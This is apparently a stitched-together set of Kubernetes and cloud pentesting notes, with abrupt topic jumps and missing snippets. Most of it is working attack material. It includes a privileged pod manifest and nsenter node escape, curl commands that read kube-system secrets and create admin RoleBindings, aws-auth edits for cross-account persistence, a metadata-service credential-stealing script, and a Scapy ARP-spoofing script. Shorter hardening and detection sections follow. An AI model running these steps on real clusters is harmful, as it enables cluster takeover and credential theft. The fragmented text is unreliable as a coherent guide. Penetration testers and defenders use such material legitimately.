      name: host-volume
  restartPolicy: Never # we want to be intentional about running this pod
  hostIPC: true # Use the host's ipc namespace https://www.man7.org/linux/man-pages/man7/ipc_namespaces.7.html
  hostNetwork: true # Use the host's network namespace https://www.man7.org/linux/man-pages/man7/network_namespaces.7.html
  hostPID: true # Use the host's pid namespace https://man7.org/linux/man-pages/man7/pid_namespaces.7.html
  volumes:
  - name: host-volume
    hostPath:
      path: /
Now that you can escape to the node check post-exploitation techniques in:
Stealth
You probably want to be stealthier, in the following pages you can see
what you would be able to access if you create a pod only enabling some of
the mentioned privileges in the previous template:
Privileged + hostPID
Privileged only
hostPath
hostPID
hostNetwork
hostIPC
You can find example of how to create/abuse the previous privileged pods
configurations in https://github.com/BishopFox/badPods
pod-escape-privileges.md
In line 6 you can find the object "spec" and children objects such as
"template" in line 10. These objects hold the configuration for the task
we wish to accomplish. Another thing to notice is the
"serviceAccountName" in line 15 and the "containers" object in line
18. This is the part that relates to creating our malicious container.
So, the privilege to create or update tasks can also be abused for
privilege escalation in the cluster.
Pods Exec
pods/exec is a resource in kubernetes used for running commands in a
shell inside a pod. This privilege is meant for administrators who want to
access containers and run commands. It's just like creating an SSH session
for the container.
If we have this privilege, we actually get the ability to take control of all
the pods. In order to do that, we need to use the following command:
kubectl exec -it <POD_NAME> -n <NAMESPACE> -- sh
Note that as you can get inside any pod, you can abuse other pods' tokens just
like in the Pod Creation exploitation to try to escalate privileges.
port-forward
This permission allows forwarding one local port to a port in the
specified pod. This is meant to make it easy to debug applications running inside
a pod, but an attacker might abuse it to get access to interesting applications (like
DBs) or vulnerable applications (webs?) inside a pod:
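For example (standard kubectl syntax; pod name and ports are placeholders):
kubectl port-forward pod/<pod-name> 1234:<pod-port> -n <namespace>
# Then interact with the forwarded application locally
curl http://localhost:1234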
allowedHostPaths:
- pathPrefix: "/foo"
readOnly: true
This was meant to prevent escapes like the previous ones by, instead of
using a hostPath mount, using a PersistentVolume and a
PersistentVolumeClaim to mount a host's folder in the container with
writable access:
apiVersion: v1
kind: PersistentVolume
metadata:
  name: task-pv-volume-vol
  labels:
    type: local
spec:
  storageClassName: manual
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  hostPath:
    path: "/var/log"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: task-pv-claim-vol
spec:
  storageClassName: manual
  accessModes:
  - ReadWriteOnce
  resources:
    requests:
      storage: 3Gi
---
apiVersion: v1
kind: Pod
metadata:
  name: task-pv-pod
spec:
  volumes:
  - name: task-pv-storage-vol
    persistentVolumeClaim:
      claimName: task-pv-claim-vol
  containers:
  - name: task-pv-container
    image: ubuntu:latest
    command: [ "sh", "-c", "sleep 1h" ]
    volumeMounts:
    - mountPath: "/hostlogs"
      name: task-pv-storage-vol
It's also possible to perform the same action via the API REST
endpoint:
Listing Secrets
The listing secrets privilege is a strong capability to have in the cluster. A
user with the permission to list secrets can potentially view all the secrets
in the cluster, including the admin keys. The secret key is a JWT token
encoded in base64.
An attacker that gains access to list secrets in the cluster can use the
following curl commands to get all secrets in the "kube-system" namespace:
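For instance (a sketch; token, IP and port are placeholders):
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/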
When looking inside the source code, it appears that the token is generated
from only 27 characters ("bcdfghjklmnpqrstvwxz2456789") and not 36 (a-z
and 0-9).
This means that there are 27^5 = 14,348,907 possibilities for a token.
So, with the new node CSR approved, you can abuse the special
permissions of nodes to steal secrets and escalate privileges.
In this post and this one the GKE K8s TLS Bootstrap configuration is
configured with automatic signing and it's abused to generate credentials
of a new K8s Node and then abuse those to escalate privileges by stealing
secrets. If you have the mentioned privileges you could do the same thing.
Note that the first example bypasses the error preventing a new node from
accessing secrets inside containers, because a node can only access the secrets
of containers mounted on it.
The way to bypass this is to create node credentials for the node
name where the container with the interesting secrets is mounted (just
check how to do it in the first post):
"/O=system:nodes/CN=system:node:gke-cluster19-default-pool-
6c73b1-8cj1"
# Check if the config map exists
kubectl get configmap aws-auth -n kube-system -o yaml

## Yaml example
apiVersion: v1
kind: ConfigMap
metadata:
  name: aws-auth
  namespace: kube-system
data:
  mapRoles: |
    - rolearn: arn:aws:iam::123456789098:role/SomeRoleTestName
      username: system:node:{{EC2PrivateDNSName}}
      groups:
        - system:masters

# Modify it
kubectl edit -n kube-system configmap/aws-auth
## You can modify it to even give access to users from other accounts
data:
  mapRoles: |
    - rolearn: arn:aws:iam::123456789098:role/SomeRoleTestName
      username: system:node:{{EC2PrivateDNSName}}
      groups:
        - system:masters
  mapUsers: |
    - userarn: arn:aws:iam::098765432123:user/SomeUserTestName
      username: admin
      groups:
        - system:masters
You can use aws-auth for persistence giving access to users from other
accounts.
Escalating in GKE
There are 2 ways to assign K8s permissions to GCP principals. In any
case the principal also needs the permission container.clusters.get to
be able to gather credentials to access the cluster, or you will need to
generate your own kubectl config file (follow the next link).
When talking to the K8s api endpoint, the GCP auth token will be sent.
Then GCP, through the K8s api endpoint, will first check if the principal
(by email) has any access inside the cluster, and then it will check if it has any
access via GCP IAM. If either of those is true, it will get a response. If
not, an error suggesting to grant permissions via GCP IAM will be returned.
Then, the first method is using GCP IAM: the K8s permissions have their
equivalent GCP IAM permissions, and if the principal has them, it will be
able to use them.
gcp-container-privesc.md
The second method is assigning K8s permissions inside the cluster to the
principal, identifying the user by its email (GCP service accounts included).
ephemeralcontainers
Principals that can update or patch pods/ephemeralcontainers can
gain code execution in other pods, and potentially break out to their node,
by adding an ephemeral container with a privileged securityContext.
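A hedged sketch of how this subresource is typically exercised (kubectl debug creates ephemeral containers; whether a privileged profile is honored depends on cluster policy):
kubectl debug -it <target-pod> --image=busybox --target=<container-name> -- sh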
ValidatingWebhookConfigurations or
MutatingWebhookConfigurations
Principals with any of the verbs create , update or patch over
validatingwebhookconfigurations or mutatingwebhookconfigurations
might be able to create one of these webhook configurations and abuse it to
escalate privileges (for example, by mutating every new pod created in the cluster).
Escalate
As you can read in the next section: Built-in Privileged Escalation
Prevention, a principal cannot update neither create roles or clusterroles
without having himself those new permissions. Except if he has the verb
escalate over roles or clusterroles .\ Then he can update/create
new roles, clusterroles with better permissions than the ones he has.
Nodes proxy
Principals with access to the nodes/proxy subresource can execute code
on pods via the Kubelet API (according to this). More information about
Kubelet authentication in this page:
kubelet-authentication-and-authorization.md
patch_node_capacity(){
  curl -s -X PATCH 127.0.0.1:8001/api/v1/nodes/$1/status -H "Content-Type: application/json-patch+json" -d '[{"op": "replace", "path":"/status/allocatable/pods", "value": "0"}]'
}
A user can only create/update a role if they already have all the
permissions contained in the role, at the same scope as the role
(cluster-wide for a ClusterRole, within the same namespace or cluster-
wide for a Role)
The purpose of this JSON file is to bind the admin "ClusterRole" (line 11)
to the compromised service account (line 16).
Now, all we need to do is to send our JSON as a POST request to the API
using the following CURL command:
curl -k -v -X POST -H "Authorization: Bearer <JWT TOKEN>" \
  -H "Content-Type: application/json" \
  https://<master_ip>:<port>/apis/rbac.authorization.k8s.io/v1/namespaces/default/rolebindings \
  -d @malicious-RoleBinging.json
Wait again until you see the change in pod status. Now you can see an
ErrImagePull error. Check the image name with either of the queries.
As you can see in the above image, we tried running the image nginx but the
final executed image is rewanthtammana/malicious-image . What just
happened!?
Technicalities
We will unfold what just happened. The ./deploy.sh script that you
executed, created a mutating webhook admission controller. The below
lines in the mutating webhook admission controller are responsible for the
above results.
The above snippet replaces the first container image in every pod with
rewanthtammana/malicious-image .
Best Practices
Prevent service account token automounting on
pods
When a pod is being created, it automatically mounts a service account token (by
default, the default service account in the same namespace). Not every pod
needs the ability to utilize the API from within itself.
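A sketch of how to disable it (the field can be set at the ServiceAccount or the Pod level; the names below are hypothetical):
apiVersion: v1
kind: Pod
metadata:
  name: no-sa-token-pod
spec:
  automountServiceAccountToken: false
  containers:
  - name: app
    image: nginx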
https://github.com/aquasecurity/kube-hunter
https://github.com/aquasecurity/kube-bench
References
https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions
https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1
Just executing something like the following will allow you to escape from
the pod:
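The escape itself boils down to entering the host's namespaces from the privileged, hostPID container (the same command used in the manifest below):
nsenter --target 1 --mount --uts --ipc --net --pid -- bash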
Configuration example:
apiVersion: v1
kind: Pod
metadata:
  name: priv-and-hostpid-exec-pod
  labels:
    app: pentest
spec:
  hostPID: true
  containers:
  - name: priv-and-hostpid-pod
    image: ubuntu
    tty: true
    securityContext:
      privileged: true
    command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
  #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
Privileged only
Kubernetes Roles Abuse Lab
You can run these labs just inside minikube.
Pod Creation -> Escalate to ns SAs
We are going to create:
echo 'apiVersion: v1
kind: ServiceAccount
metadata:
name: test-sa
---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: test-r
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["get", "list", "delete", "patch", "create"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: test-rb
subjects:
- kind: ServiceAccount
name: test-sa
- kind: User
name: Test
roleRef:
kind: Role
name: test-r
apiGroup: rbac.authorization.k8s.io
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: test-cr
rules:
- apiGroups: [""]
resources: ["secrets"]
verbs: ["get", "list", "delete", "patch", "create"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: test-crb
subjects:
- kind: ServiceAccount
namespace: default
name: test-sa
apiGroup: ""
roleRef:
kind: ClusterRole
name: test-cr
apiGroup: rbac.authorization.k8s.io' | kubectl apply -f -
echo 'apiVersion: v1
kind: ServiceAccount
metadata:
name: test-sa
---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: test-r
rules:
- apiGroups: ["apps"]
resources: ["daemonsets"]
verbs: ["get", "list", "create"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: test-rb
subjects:
- kind: User
name: Test
roleRef:
kind: Role
name: test-r
apiGroup: rbac.authorization.k8s.io
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: test-cr
rules:
- apiGroups: [""]
resources: ["secrets"]
verbs: ["get", "list", "delete", "patch", "create"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: test-crb
subjects:
- kind: ServiceAccount
namespace: default
name: test-sa
apiGroup: ""
roleRef:
kind: ClusterRole
name: test-cr
apiGroup: rbac.authorization.k8s.io' | kubectl apply -f -
Patch Daemonset
In this case we are going to patch a daemonset to make its pod load our
desired service account.
If your user has the verb update instead of patch, this won't work.
# Create Service Account test-sa
# Create role and rolebinding to give list & update patch
permissions over daemonsets in default namespace to user Test
# Create clusterrole and clusterrolebinding to give the SA
test-sa access to secrets everywhere
echo 'apiVersion: v1
kind: ServiceAccount
metadata:
name: test-sa
---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: test-r
rules:
- apiGroups: ["apps"]
resources: ["daemonsets"]
verbs: ["get", "list", "patch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: test-rb
subjects:
- kind: User
name: Test
roleRef:
kind: Role
name: test-r
apiGroup: rbac.authorization.k8s.io
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: test-cr
rules:
- apiGroups: [""]
resources: ["secrets"]
verbs: ["get", "list", "delete", "patch", "create"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: test-crb
subjects:
- kind: ServiceAccount
namespace: default
name: test-sa
apiGroup: ""
roleRef:
kind: ClusterRole
name: test-cr
apiGroup: rbac.authorization.k8s.io
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: alpine
namespace: default
spec:
selector:
matchLabels:
name: alpine
template:
metadata:
labels:
name: alpine
spec:
automountServiceAccountToken: false
hostNetwork: true
containers:
- name: alpine
image: alpine
command: ['/bin/sh']
args: ['-c', 'sleep 100']' | kubectl apply -f -
# Clean environment
kubectl delete clusterrolebindings test-crb
kubectl delete clusterrolebindings test-crb2
kubectl delete clusterrole test-cr
kubectl delete serviceaccount test-sa
kubectl delete serviceaccount test-sa
# Like the previous example, but in this case we try to use RoleBindings
# instead of ClusterRoleBindings
echo 'apiVersion: v1
kind: ServiceAccount
metadata:
name: test-sa
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: test-sa2
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: test-cr
rules:
- apiGroups: ["rbac.authorization.k8s.io"]
resources: ["clusterrolebindings"]
verbs: ["get", "create"]
- apiGroups: ["rbac.authorization.k8s.io"]
resources: ["rolebindings"]
verbs: ["get", "create"]
- apiGroups: ["rbac.authorization.k8s.io/v1"]
resources: ["clusterroles"]
verbs: ["bind"]
resourceNames: ["admin","edit","view"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: test-rb
namespace: default
subjects:
- kind: ServiceAccount
name: test-sa
namespace: default
roleRef:
kind: ClusterRole
name: test-cr
apiGroup: rbac.authorization.k8s.io
' | kubectl apply -f -
# Won't work
echo 'apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: test-rb2
namespace: default
subjects:
- kind: ServiceAccount
name: test-sa2
namespace: default
roleRef:
kind: ClusterRole
name: admin
apiGroup: rbac.authorization.k8s.io
' | kubectl --as system:serviceaccount:default:test-sa apply -f
-
# Clean environment
kubectl delete rolebindings test-rb
kubectl delete rolebindings test-rb2
kubectl delete clusterrole test-cr
kubectl delete serviceaccount test-sa
kubectl delete serviceaccount test-sa2
Arbitrary roles creation
In this example we try to create a role having the permissions create and
path over the roles resources. However, K8s prevent us from creating a role
with more permissions the principal creating is has:
# Create a SA and give the permissions "create" and "patch"
over "roles"
echo 'apiVersion: v1
kind: ServiceAccount
metadata:
name: test-sa
---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: test-r
rules:
- apiGroups: ["rbac.authorization.k8s.io"]
resources: ["roles"]
verbs: ["patch", "create", "get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: test-rb
subjects:
- kind: ServiceAccount
name: test-sa
roleRef:
kind: Role
name: test-r
apiGroup: rbac.authorization.k8s.io
' | kubectl apply -f -
Here are some techniques you can try to escape to a different namespace:
For more info about which privileges you can abuse read:
abusing-roles-clusterroles-in-kubernetes
attacking-kubernetes-from-inside-a-pod.md
In the second step the credentials of the GSA were set as a secret of the
KSA. Then, if you can read that secret from inside the GKE cluster, you
can escalate to that GCP service account.
Create the GCP Service Account to impersonate from K8s with GCP
permissions:
# Create SA called "gsa2ksa"
gcloud iam service-accounts create gsa2ksa --project=<project-id>
# Allow the KSA to access the GSA in GCP IAM
gcloud iam service-accounts add-iam-policy-binding gsa2ksa@<project-id>.iam.gserviceaccount.com \
    --role roles/iam.workloadIdentityUser \
    --member "serviceAccount:<project-id>.svc.id.goog[<namespace>/ksa2gcp]"
Run a pod with the KSA and check the access to GSA:
# If using Autopilot remove the nodeSelector stuff!
echo "apiVersion: v1
kind: Pod
metadata:
  name: workload-identity-test
  namespace: <namespace>
spec:
  containers:
  - image: google/cloud-sdk:slim
    name: workload-identity-test
    command: ['sleep','infinity']
  serviceAccountName: ksa2gcp
  nodeSelector:
    iam.gke.io/gke-metadata-server-enabled: 'true'" | kubectl apply -f-

# Check you can access the GSA from inside the pod with
curl -H "Metadata-Flavor: Google" http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/email
gcloud auth list
As an attacker inside K8s you should search for SAs with the
iam.gke.io/gcp-service-account annotation as that indicates that the
SA can access something in GCP. Another option would be to try to abuse
each KSA in the cluster and check if it has access. From GCP it is always
interesting to enumerate the bindings and know which access you are
giving to SAs inside Kubernetes.
This is a script to easily iterate over all the pod definitions looking
for that annotation:
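A minimal sketch of such a script (assumes kubectl access; it resolves each pod's service account and greps its definition for the annotation):
for ns in $(kubectl get ns -o jsonpath='{.items[*].metadata.name}'); do
  for pod in $(kubectl get pods -n "$ns" -o name); do
    sa=$(kubectl get "$pod" -n "$ns" -o jsonpath='{.spec.serviceAccountName}')
    kubectl get sa "$sa" -n "$ns" -o yaml 2>/dev/null | grep -q "iam.gke.io/gcp-service-account" \
      && echo "[+] $ns/$pod uses SA $sa with the iam.gke.io/gcp-service-account annotation"
  done
done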
First of all you need to configure which roles can be accessed inside the
namespace, and you do that with an annotation inside the namespace
object:
Kiam
kind: Namespace
metadata:
  name: iam-example
  annotations:
    iam.amazonaws.com/permitted: ".*"
Kube2iam
apiVersion: v1
kind: Namespace
metadata:
  name: default
  annotations:
    iam.amazonaws.com/allowed-roles: |
      ["role-arn"]
Once the namespace is configured with the IAM roles the Pods can have
you can indicate the role you want on each pod definition with
something like:
kind: Pod
metadata:
  name: foo
  namespace: external-id-example
  annotations:
    iam.amazonaws.com/role: reportingdb-reader
echo 'apiVersion: v1
kind: Pod
metadata:
  annotations:
    iam.amazonaws.com/role: transaction-metadata
  name: alpine
  namespace: eevee
spec:
  containers:
  - name: alpine
    image: alpine
    command: ["/bin/sh"]
    args: ["-c", "sleep 100000"]' | kubectl apply -f -
1. First of all you need to create an OIDC provider for the cluster.
2. Then you create an IAM role with the permissions the SA will require.
3. Create a trust relationship between the IAM role and the SA name (or
the namespaces giving access to the role to all the SAs of the
namespace). The trust relationship will mainly check the OIDC
provider name, the namespace name and the SA name.
4. Finally, create a SA with an annotation indicating the ARN of the
role, and the pods running with that SA will have access to the token
of the role. The token is written inside a file and the path is specified
in AWS_WEB_IDENTITY_TOKEN_FILE (default:
/var/run/secrets/eks.amazonaws.com/serviceaccount/token )
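As a sketch of step 4 (the annotation key is the standard EKS one; the SA name is hypothetical and the ARN reuses the illustrative value from above):
apiVersion: v1
kind: ServiceAccount
metadata:
  name: irsa-example-sa
  namespace: default
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::123456789098:role/SomeRoleTestName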
Moreover, if you are inside a pod, check for env variables like
AWS_ROLE_ARN and AWS_WEB_IDENTITY_TOKEN.
Sometimes the Trust Policy of a role might be badly configured and instead
of giving AssumeRole access to the expected service account, it gives it to
all the service accounts. Therefore, if you are capable of writing an
annotation on a controlled service account, you can access the role.
aws-federation-abuse.md
You can use the following script to steal your new hard-earned IAM role
credentials:
IAM_ROLE_NAME=$(curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null || wget http://169.254.169.254/latest/meta-data/iam/security-credentials/ -O - 2>/dev/null)
if [ "$IAM_ROLE_NAME" ]; then
  echo "IAM Role discovered: $IAM_ROLE_NAME"
  if ! echo "$IAM_ROLE_NAME" | grep -q "empty role"; then
    echo "Credentials:"
    curl "http://169.254.169.254/latest/meta-data/iam/security-credentials/$IAM_ROLE_NAME" 2>/dev/null || wget "http://169.254.169.254/latest/meta-data/iam/security-credentials/$IAM_ROLE_NAME" -O - 2>/dev/null
  fi
fi
References
https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity
https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c
https://blogs.halodoc.io/iam-roles-for-service-accounts-2/
ARP
Generally speaking, pod-to-pod networking inside the node is available
via a bridge that connects all pods. This bridge is called "cbr0". (Some
network plugins will install their own bridge.) The cbr0 can also handle
ARP (Address Resolution Protocol) resolution. When an incoming packet
arrives at cbr0, it can resolve the destination MAC address using ARP.
This fact implies that, by default, every pod running in the same node is
going to be able to communicate with any other pod in the same node
(independently of the namespace) at ethernet level (layer 2).
DNS
In kubernetes environments you will usually find 1 (or more) DNS services
running usually in the kube-system namespace:
kubectl -n kube-system describe services
Name: kube-dns
Namespace: kube-system
Labels: k8s-app=kube-dns
kubernetes.io/cluster-service=true
kubernetes.io/name=KubeDNS
Annotations: prometheus.io/port: 9153
prometheus.io/scrape: true
Selector: k8s-app=kube-dns
Type: ClusterIP
IP Families: <none>
IP: 10.96.0.10
IPs: 10.96.0.10
Port: dns 53/UDP
TargetPort: 53/UDP
Endpoints: 172.17.0.2:53
Port: dns-tcp 53/TCP
TargetPort: 53/TCP
Endpoints: 172.17.0.2:53
Port: metrics 9153/TCP
TargetPort: 9153/TCP
Endpoints: 172.17.0.2:9153
In the previous info you can see something interesting, the IP of the service
is 10.96.0.10 but the IP of the pod running the service is 172.17.0.2.
If you check the DNS address inside any pod you will find something like
this:
cat /etc/resolv.conf
nameserver 10.96.0.10
However, the pod doesn't know how to get to that address because the pod
range in this case is 172.17.0.10/26.
Therefore, the pod will send the DNS requests to the address 10.96.0.10
which will be translated by the cbr0 to 172.17.0.2.
This means that a DNS request of a pod is always going to go the bridge
to translate the service IP to the endpoint IP, even if the DNS server is in
the same subnetwork as the pod.
Knowing this, and knowing ARP attacks are possible, a pod in a node is
going to be able to intercept the traffic between each pod in the
subnetwork and the bridge and modify the DNS responses from the DNS
server (DNS Spoofing).
Moreover, if the DNS server is in the same node as the attacker, the
attacker can intercept all the DNS request of any pod in the cluster
(between the DNS server and the bridge) and modify the responses.
ARP Spoofing in pods in the same
Node
Our goal is to steal at least the communication from the ubuntu-victim
to the mysql.
Scapy
python3 /tmp/arp_spoof.py
Enter Target IP:172.17.0.10 #ubuntu-victim
Enter Gateway IP:172.17.0.9 #mysql
Target MAC 02:42:ac:11:00:0a
Gateway MAC: 02:42:ac:11:00:09
Sending spoofed ARP responses
arp_spoof.py
#From
https://gist.github.com/rbn15/bc054f9a84489dbdfc35d333e3d63c87#
file-arpspoofer-py
from scapy.all import *
def getmac(targetip):
arppacket= Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1,
pdst=targetip)
targetmac= srp(arppacket, timeout=2 , verbose= False)[0][0]
[1].hwsrc
return targetmac
def main():
targetip= input("Enter Target IP:")
gatewayip= input("Enter Gateway IP:")
try:
targetmac= getmac(targetip)
print("Target MAC", targetmac)
except:
print("Target machine did not respond to ARP
broadcast")
quit()
try:
gatewaymac= getmac(gatewayip)
print("Gateway MAC:", gatewaymac)
except:
print("Gateway is unreachable")
quit()
try:
print("Sending spoofed ARP responses")
while True:
spoofarpcache(targetip, targetmac, gatewayip)
spoofarpcache(gatewayip, gatewaymac, targetip)
except KeyboardInterrupt:
print("ARP spoofing stopped")
restorearp(gatewayip, gatewaymac, targetip, targetmac)
restorearp(targetip, targetmac, gatewayip, gatewaymac)
quit()
if __name__=="__main__":
main()
ARPSpoof
In our scenario, download the tool in the attacker pod and create a file
named hosts with the domains you want to spoof, like:
cat hosts
google.com. 1.1.1.1
If you try to create your own DNS spoofing script, just modifying the DNS
response is not going to work, because the response will have as src IP the
IP address of the malicious pod and won't be accepted. You need to generate
a new DNS packet with the src IP of the DNS server where the victim sent
the DNS request (which is something like 172.16.0.2, not 10.96.0.10, because
that's the K8s DNS service IP and not the DNS server IP; more about this in
the introduction).
Capturing Traffic
The tool Mizu is a simple-yet-powerful API traffic viewer for Kubernetes,
enabling you to view all API communication between microservices to
help you debug and troubleshoot regressions. It will install agents in the
selected pods, gather their traffic information and show it to you in a web
server. However, you will need high K8s permissions for this (and it's not
very stealthy).
References
https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1
https://blog.aquasec.com/dns-spoofing-kubernetes-clusters
Kube-bench
The tool kube-bench checks whether Kubernetes is deployed
securely by running the checks documented in the CIS Kubernetes
Benchmark. You can choose to:
kubeaudit all
This tool also has the argument autofix to automatically fix detected
issues.
Popeye
Popeye is a utility that scans live Kubernetes clusters and reports potential
issues with deployed resources and configurations. It sanitizes your
cluster based on what's deployed and not what's sitting on disk. By scanning
your cluster, it detects misconfigurations and helps you to ensure that best
practices are in place, thus preventing future headaches. It aims at reducing
the cognitive overload one faces when operating a Kubernetes cluster in
the wild. Furthermore, if your cluster employs a metric-server, it reports
potential resource over/under allocations and attempts to warn you should
your cluster run out of capacity.
KICS
KICS finds security vulnerabilities, compliance issues, and infrastructure
misconfigurations in the following Infrastructure as Code solutions:
Terraform, Kubernetes, Docker, AWS CloudFormation, Ansible, Helm,
Microsoft ARM, and OpenAPI 3.0 specifications
Checkov
Checkov is a static code analysis tool for infrastructure-as-code.
kubernetes-securitycontext-s.md
Tips:
Close ports.
Avoid Anonymous access.
NodeRestriction; No access from specific nodes to the API.
https://kubernetes.io/docs/reference/access-authn-
authz/admission-controllers/#noderestriction
Basically prevents kubelets from adding/removing/updating
labels with a node-restriction.kubernetes.io/ prefix. This label
prefix is reserved for administrators to label their Node objects
for workload isolation purposes, and kubelets will not be allowed
to modify labels with that prefix.
And also, allows kubelets to add/remove/update these labels and
label prefixes.
Ensure with labels the secure workload isolation.
Avoid specific pods from API access.
Avoid ApiServer exposure to the internet.
Avoid unauthorized access RBAC.
ApiServer port with firewall and IP whitelisting.
SecurityContext Hardening
By default the root user will be used when a Pod is started if no other user is
specified. You can run your application inside a more secure context using a
template similar to the following one:
apiVersion: v1
kind: Pod
metadata:
  name: security-context-demo
spec:
  securityContext:
    runAsUser: 1000
    runAsGroup: 3000
    fsGroup: 2000
  volumes:
  - name: sec-ctx-vol
    emptyDir: {}
  containers:
  - name: sec-ctx-demo
    image: busybox
    command: [ "sh", "-c", "sleep 1h" ]
    securityContext:
      runAsNonRoot: true
      allowPrivilegeEscalation: false
    volumeMounts:
    - name: sec-ctx-vol
      mountPath: /data/demo
https://kubernetes.io/docs/tasks/configure-pod-container/security-context/
https://kubernetes.io/docs/concepts/policy/pod-security-policy/
Kubernetes NetworkPolicies
kubernetes-networkpolicies.md
General Hardening
You should update your Kubernetes environment as frequently as necessary
to have:
Dependencies up to date.
Bug and security patches.
Scenario Information
This scenario is about deploying a simple network security policy for Kubernetes
resources to create security boundaries.
Scenario Solution
The below scenario is from https://github.com/ahmetb/kubernetes-network-policy-recipes
If you want to control traffic flow at the IP address or port level (OSI layer
3 or 4), then you might consider using Kubernetes NetworkPolicies for
particular applications in your cluster. NetworkPolicies are an application-
centric construct which allow you to specify how a pod is allowed to
communicate with various network "entities" (we use the word "entity" here
to avoid overloading the more common terms such as "endpoints" and
"services", which have specific Kubernetes connotations) over the network.
The entities that a Pod can communicate with are identified through a
combination of the following 3 identifiers:
1. Other pods that are allowed (exception: a pod cannot block access to itself)
2. Namespaces that are allowed
3. IP blocks (exception: traffic to and from the node where a Pod is
running is always allowed, regardless of the IP address of the Pod or
the node)
When defining a pod- or namespace-based NetworkPolicy, you use a
selector to specify what traffic is allowed to and from the Pod(s) that
match the selector.
Use Cases:
Try it out
Run a test container again, and try to query web
Traffic dropped
Remarks
In the manifest above, we target Pods with the app=web label to apply the policy. This manifest is missing the spec.ingress field, therefore it is not allowing any traffic into the Pod.
If you create another NetworkPolicy that gives some Pods access to
this application directly or indirectly, this NetworkPolicy will be
obsolete.
If there is at least one NetworkPolicy with a rule allowing the traffic, it
means the traffic will be routed to the pod regardless of the policies
blocking the traffic.
Cleanup
Set allowPrivilegeEscalation to false.
Do not add sensitive capabilities (and remove the ones you don't need).
Set privileged to false.
If possible, set readOnlyRootFilesystem to true.
Set runAsNonRoot to true and set a runAsUser.
If possible, consider limiting permissions indicating seLinuxOptions and seccompProfile.
Do NOT give privileged group access via runAsGroup.
Scenario Information
This scenario deploys runtime security monitoring & detection for containers and Kubernetes resources.
To get started with this scenario you can deploy the below helm chart with version 3.
NOTE: Make sure you run the following deployment using Helm v3.
Scenario Solution
Falco , the cloud-native runtime security project, is the de facto
Kubernetes threat detection engine. Falco was created by Sysdig in
2016 and is the first runtime security project to join CNCF as an
incubation-level project. Falco detects unexpected application behavior
and alerts on threats at runtime.
Falco ships with a default set of rules that check the kernel for unusual
behavior such as:
Now, let's spin up a hacker container, read a sensitive file and see if Falco detects it:
cat /etc/shadow
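A quick way to reproduce that step (the pod name and image are arbitrary placeholders, assuming you have kubectl access to the cluster):
kubectl run hacker-container --image=alpine --restart=Never -it -- sh
# inside the container, read a sensitive file to trigger the Falco rule
cat /etc/shadow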
gcp-basic-information.md
Labs to learn
https://gcpgoat.joshuajebaraj.com/
https://github.com/ine-labs/GCPGoat
https://github.com/carlospolop/gcp_privesc_scripts
GCP Pentester/Red Team
Methodology
In order to audit a GCP environment it's very important to know: which services are being used, what is being exposed, who has access to what, and how internal GCP services and external services are connected.
From a Red Team point of view, the first step to compromise a GCP
environment is to manage to obtain some credentials. Here you have some
ideas on how to do that:
C:\Users\USERNAME\.config\gcloud\*
gcp-unauthenticated-enum
Or if you are doing a review you could just ask for credentials with these
roles:
gcp-permissions-for-a-pentest.md
After you have managed to obtain credentials, you need to know who those creds belong to and what they have access to, so you need to perform some basic enumeration:
Basic Enumeration
SSRF
For more information about how to enumerate GCP metadata check the
following hacktricks page:
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-
forgery/cloud-ssrf#6440
Whoami
In AWS you can use the STS service to find out who some API keys belong to; in GCP there isn't anything like that, but just by reading the email of the identity you might find interesting information.
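For instance, a minimal sketch to see which identity gcloud is currently using:
gcloud auth list
gcloud config get-value account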
Org Enumeration
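A few read-only commands that may help map the resource hierarchy (a sketch; each requires the corresponding viewer permissions and ORG_ID is a placeholder):
gcloud organizations list
gcloud resource-manager folders list --organization ORG_ID
gcloud projects list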
IAM Enumeration
If you have enough permissions checking the privileges of each entity
inside the GCP account will help you understand what you and other
identities can do and how to escalate privileges.
If you don't have enough permissions to enumerate IAM, you can still brute-force the permissions to figure them out. Check how to do the enumeration and brute-forcing in:
